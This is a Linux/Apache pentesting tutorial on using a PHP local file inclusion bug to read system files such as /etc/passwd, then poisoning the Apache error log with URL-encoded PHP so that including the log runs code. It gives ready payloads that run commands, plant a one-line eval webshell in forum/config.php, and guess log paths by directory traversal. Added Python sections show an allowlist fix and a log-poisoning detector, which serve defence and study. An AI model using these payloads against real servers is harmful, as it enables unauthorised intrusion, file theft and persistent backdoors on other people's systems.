Pentesting essentials: getting a shell on Linux via backup
Take a PHP script with a file inclusion vulnerability, that is, an include statement like this one:
<? include($zizzy); ?> // includes whatever file the variable $zizzy names
(The script takes $zizzy straight from the query string: register_globals is on, or the script assigns it from $_GET itself.)
You can then request
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd
and use the include statement to read system configuration and the password file: any file the web server's user is allowed to read.
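As an added example, not from the original article, here is the check a fixed version of the include above needs, written in Python so it runs stand-alone (a PHP fix would do the same with an allowlist and realpath()). Two layers are kept separate so the difference is visible: a canonicalisation-only check that keeps the resolved path under DocumentRoot, and an allowlist that maps a page name to a file. The DocumentRoot and the file names are taken from the httpd.conf and the directory listing later in the article; the page-name mapping is an assumption. Note the edge case on this particular host: the logs directory sits under DocumentRoot, so containment alone still admits the error log, which is why the allowlist is the real fix.

```python
import posixpath

DOCROOT = "/home/virtual/www.xxx.com"     # DocumentRoot from the article's httpd.conf
# Allowlist: page name -> file. The file names are from the listing in the
# article; the mapping itself is an assumption made for this example.
PAGES = {"index": "index.php", "about": "about.php", "show": "show.php"}


def contained_path(user_value: str, docroot: str = DOCROOT):
    """Canonicalisation-only check. Resolves user_value below docroot and refuses
    anything that escapes it. Returns the resolved path, or None to refuse.
    (PHP's realpath() does the same and additionally resolves symlinks.)"""
    if "\x00" in user_value:               # null-byte truncation in older PHP
        return None
    if user_value.startswith("/"):         # absolute paths are never legitimate here
        return None
    full = posixpath.normpath(posixpath.join(docroot, user_value))
    if full != docroot and not full.startswith(docroot + "/"):
        return None                        # ../ walked out of the document root
    return full


def resolve_include(user_value: str, docroot: str = DOCROOT, pages=PAGES):
    """Allowlist check: the client names a page, never a path. This is the fix;
    contained_path() alone is not enough because on this host the logs live
    under DocumentRoot and the poisoned error log would still pass."""
    filename = pages.get(user_value)
    if filename is None:
        return None
    return posixpath.join(docroot, filename)


if __name__ == "__main__":
    for probe in ("about.php", "../../../../etc/passwd", "/etc/passwd",
                  "logs/www-error_log", "about", "logs"):
        print("%-28s contained=%-45s allowlist=%s"
              % (probe, contained_path(probe), resolve_include(probe)))
```

Run it and compare the two columns: the traversal and absolute-path probes are refused by both checks, but logs/www-error_log passes the containment check and is only stopped by the allowlist.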
Now on to log inclusion.
Say Apache's server configuration file lives here:
/usr/local/apache/conf/httpd.conf
Include httpd.conf first to learn the paths and so on:
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf
This reads out Apache's configuration; part of it is shown here.
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>
Requesting http://xxx.com/z.php?zizzy=/home … /logs/www-error_log
then reads out Apache's error log:
[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not exist: /home/virtual/www.xxx.com/hack.php
[Tue Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not exist: /home/virtual/www.xxx.com/111111111.php
[Wed Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not exist: /home/virtual/www.xxx.com/22222.php3
[Wed Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/forum
[Fri Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/blog
[Fri Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/kkkkkkkk
The access log /home/virtual/www.xxx.com/logs/www-access_log can be read the same way; it is just very large, so there is little point in going further with it. So how do we turn this into something useful?
For instance, submit <?phpinfo();?> // dumps PHP's configuration
It has to be submitted URL-encoded. In testing the <? marker was never recorded when sent as-is: a literal ? starts the query string, so Apache maps only the path /< to the filesystem and that is all the error log gets. Percent-encoded, the whole string is decoded back and written into the error log as part of the missing file name. (This is also why the error log rather than the access log is used: the access log's %r field keeps the request line raw, still encoded.)
<%3Fphpinfo%28%29%3B%3F> is the encoded form of <?phpinfo();?>. Submit
http://www.xxx.com/<%3Fphpinfo%28%29%3B%3F>
This is bound to fail with a page-not-found error, and the error is written to the error log. Now include the log:
http://xxx.com/z.php?zizzy=/home … /logs/www-error_log
The log file is parsed as PHP, the <?phpinfo();?> inside it executes, and the response turns into a phpinfo page.
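The encoding rule and the two log formats, as an added example that is not part of the original article. It models what Apache does with the request line for a missing file: the request-target is split from the query string at the first literal ?, the error log records the decoded filesystem path, and the access log (CustomLog ... common) records the raw request line. encode_payload() reproduces the article's scheme (everything but letters, digits, < and > becomes %XX) and also covers the system() and fopen payloads later on, where spaces become %20. The DocumentRoot and client address are the article's; the timestamps and the log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

DOCROOT = "/home/virtual/www.xxx.com"   # DocumentRoot from the article's httpd.conf
PHP_BLOCK = re.compile(r"<\?.*?\?>", re.S)


def encode_payload(payload: str) -> str:
    """Percent-encode a PHP payload the way the article does: every byte except
    ASCII letters, digits, '<' and '>' becomes %XX. In particular the '?' of the
    open tag is encoded, so it cannot be taken as the start of a query string."""
    out = []
    for b in payload.encode("utf-8"):
        ch = chr(b)
        if (b < 128 and ch.isalnum()) or ch in "<>":
            out.append(ch)
        else:
            out.append("%{:02X}".format(b))
    return "".join(out)


def request_path(target: str) -> str:
    """The server splits the request-target at the first literal '?'; only the
    part before it is mapped to the filesystem (percent-decoded)."""
    path, _sep, _query = target.partition("?")
    return unquote(path)


def error_log_line(target: str, client: str = "218.63.194.76") -> str:
    """Constructed error_log entry for a request for a missing file: Apache
    records the DECODED filesystem path, which is what makes the trick work."""
    return ("[Mon Jan 22 14:01:16 2005] [error] [client %s] "
            "File does not exist: %s%s" % (client, DOCROOT, request_path(target)))


def access_log_line(target: str, client: str = "218.63.194.76") -> str:
    """Constructed access_log entry (CustomLog ... common): %r is the RAW request
    line, so the payload stays percent-encoded and would not run if included."""
    return '%s - - [22/Jan/2005:14:01:16 +0800] "GET %s HTTP/1.0" 404 -' % (client, target)


def php_blocks(log_text: str):
    """Approximation of what include() would execute from the log text: every
    <? ... ?> span (short_open_tag on, as the article's <? include ... ?> needs).
    Naive: it does not model ?> inside PHP string literals."""
    return PHP_BLOCK.findall(log_text)


def compare(payload: str = "<?phpinfo();?>") -> dict:
    """Send the payload raw and encoded; report what each log would hold."""
    raw = "/" + payload
    enc = "/" + encode_payload(payload)
    return {
        "encoded_target": enc,
        "raw_error_log": error_log_line(raw),
        "enc_error_log": error_log_line(enc),
        "enc_access_log": access_log_line(enc),
        "raw_error_blocks": php_blocks(error_log_line(raw)),
        "enc_error_blocks": php_blocks(error_log_line(enc)),
        "enc_access_blocks": php_blocks(access_log_line(enc)),
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print("%-18s %s" % (key, value))
```

The raw attempt leaves only /< in the error log and nothing executable; the encoded one leaves the full <?phpinfo();?>; and the access log entry for the same encoded request contains no open tag at all, because %3F is never decoded there.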
If system commands are allowed (safe_mode off, and system() not listed in disable_functions), this works too:
<?system("ls -la /home");?> // list the files under /home; encode it before submitting, with the spaces as %20 (a + in the request path is not turned into a space, it is passed through literally)
/home/
total 9
-rw-r--r-- 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r--r-- 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r--r-- 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r--r-- 1 www.xxx.com silver 7024 Dec 4 03:07 test.php
That lists the files under /home.
Or go straight for a one-line shell, <?eval($_POST[cmd]);?>,
which encoded becomes <%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F>.
Submit
http://www.xxx.com/<%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F>
then connect with lanker's one-liner client (its target is the inclusion URL, since the one-liner only exists inside the log) and you are in.
That approach is impractical, though: in testing the log was routinely tens of megabytes, and dragging the whole file through include() on every command is no fun. So let's go a step further and write a real webshell to disk, which is also far faster than the painfully slow method above.
Take the same one-line shell,
<?eval($_POST[cmd]);?>
You can probably see where this is going; the question is how to get it written to disk. Use fopen to open /home/virtual/www.xxx.com/forum/config.php and write the one-liner into it. As a single PHP statement:
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,'<?eval($_POST[cmd]);?>');fclose($fp);?> // write the one-liner into config.php
The one-liner has to be in single quotes: inside double quotes PHP interpolates $_POST[cmd], and the file would end up containing <?eval();?> instead of the shell.
Submit this, let Apache record it in the error log, then include the log and the shell is written. It has to be URL-encoded or it will not work.
Encoded:
<%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27<%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F>%27%29%3Bfclose%28%24fp%29%3B%3F>
Submit
http://xxx.com/<%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27<%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F>%27%29%3Bfclose%28%24fp%29%3B%3F>
The error log now holds that line of webshell-writing code.
Include the log again by requesting
http://xxx.com/z.php?zizzy=/home … /logs/www-error_log
and the webshell is written: config.php now contains the one-liner.
OK.
http://www.xxx.com/forum/config.php is now our webshell.
Connect to it with lanker's client and the host is yours.
PS: All of the above requires that the target directory be writable by the user Apache runs as (here the vhost's User/Group); a world-writable -rwxrwxrwx (777) directory is the safe bet, so check the listing obtained above and pick one. Note too that "w+" truncates the file, so writing into an existing forum/config.php wipes the forum's own configuration; a filename that does not exist yet is the better choice. Everything above also assumes the log path is already known.
Other log paths you can guess, or consult the list below.
Appendix: some collected log paths
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
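An added example, not part of the article: a detector for the two request patterns this technique leaves behind, run over constructed access_log and error_log lines (the client addresses and vhost paths reuse the article's values, the lines themselves are made up). It flags include parameters whose value is an absolute path, a ../ traversal or one of the log file names from the list above, and request paths or error messages that contain a PHP open tag once percent-decoded. The line layouts follow the CustomLog ... common format from the httpd.conf and the error_log format shown earlier.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# "CustomLog ... common" line, as configured in the article's vhost
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# error_log line in the format the article shows
ERROR_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$')

PHP_OPEN_TAG = re.compile(r"<\?")                  # matches <?, <?php and <?=
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a bare ".." path component
LOG_NAMES = ("access_log", "error_log", "access.log", "error.log")


def classify_param(value: str):
    """Why a query-parameter value looks like an LFI probe, or None."""
    if TRAVERSAL.search(value):
        return "lfi-traversal"
    if value.endswith(LOG_NAMES):
        return "lfi-log-file"          # reading a log to trigger poisoned code
    if value.startswith("/"):
        return "lfi-absolute-path"     # /etc/passwd, /proc/cpuinfo, httpd.conf ...
    return None


def inspect_line(line: str):
    """Findings for one log line as (client_ip, kind, evidence) tuples."""
    findings = []
    m = ACCESS_RE.match(line)
    if m:
        parts = urlsplit(m.group("target"))
        path = unquote(parts.path)
        if PHP_OPEN_TAG.search(path):
            findings.append((m.group("ip"), "log-poisoning", path))
        # parse_qsl percent-decodes the values for us
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_param(value)
            if kind:
                findings.append((m.group("ip"), kind, "%s=%s" % (name, value)))
        return findings
    m = ERROR_RE.match(line)
    if m and PHP_OPEN_TAG.search(m.group("msg")):
        # the decoded path Apache wrote is the code include() would run
        findings.append((m.group("ip"), "log-poisoning", m.group("msg")))
    return findings


def scan(lines):
    return [f for line in lines for f in inspect_line(line)]


# Constructed sample lines (not taken from the article's logs).
SAMPLE_LINES = [
    '218.63.194.76 - - [22/Jan/2005:14:00:01 +0800] "GET /index.php HTTP/1.0" 200 1438',
    '218.63.148.38 - - [22/Jan/2005:14:00:05 +0800] "GET /z.php?zizzy=/etc/passwd HTTP/1.0" 200 2412',
    '218.63.148.38 - - [22/Jan/2005:14:00:09 +0800] "GET /z.php?zizzy=../../../../../../../../../../var/log/httpd/error_log HTTP/1.0" 200 0',
    '218.63.148.38 - - [22/Jan/2005:14:00:12 +0800] "GET /z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log HTTP/1.0" 200 8123',
    '218.63.148.38 - - [22/Jan/2005:14:01:16 +0800] "GET /<%3Fphpinfo%28%29%3B%3F> HTTP/1.0" 404 -',
    '[Mon Jan 22 14:01:16 2005] [error] [client 218.63.148.38] File does not exist: /home/virtual/www.xxx.com/<?phpinfo();?>',
    '[Mon Jan 22 14:01:17 2005] [error] [client 218.63.194.76] File does not exist: /home/virtual/www.xxx.com/hack.php',
]

if __name__ == "__main__":
    for ip, kind, evidence in scan(SAMPLE_LINES):
        print(ip, kind, evidence)
```

The poisoning attempt shows up twice on purpose: once in the access log, where the path has to be decoded before the open tag is visible, and once in the error log, where Apache has already decoded it. Ordinary 404s such as hack.php and the index.php request produce nothing.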